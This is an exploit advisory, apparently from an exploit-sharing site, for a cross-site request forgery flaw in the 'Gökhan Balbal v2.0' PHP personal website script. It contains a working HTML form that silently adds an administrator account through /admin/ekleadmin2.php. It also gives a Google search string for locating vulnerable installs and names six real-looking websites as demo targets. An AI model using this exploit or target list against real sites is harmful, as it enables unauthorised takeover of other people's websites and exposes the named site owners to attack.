Gökhan Balbal v2.0 => Cross-Site Request Forgery Exploit (Add Admin) ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com [~] Þeker Insanlar : ZoRLu, ( milw00rm.com ), Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon KedAns-Dz, b3mb4m ########################################################### ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Gökhan Balbal |~Affected Version : v2.0 |~Software : http://wmscripti.com/php-scriptler/gokhan-balbal-kisisel-web-site-scripti.html |~RISK : High |~Google Keyword : "DiL BECERiLERi" "HoBi" "TASARIM BECERiLERi" ################++ DEMO ++ ####################################### http://www.melihakturk.com http://egemenft.com http://onurarkan.ga http://www.ferdikaya.net http://www.serkanoduncu.com http://denizmemege.com/ ##################++ Exploit ++ ###################################### <html> <body> <form action="http://[TARGET]/admin/ekleadmin2.php" method="POST"> <input type="hidden" name="kadi" value="knockout" /> <input type="hidden" name="sifre" value="password" /> <input type="hidden" name="Submit" value="Exploit!" /> <input type="submit" value="Submit request" /> </form> </body> </html> ############################################################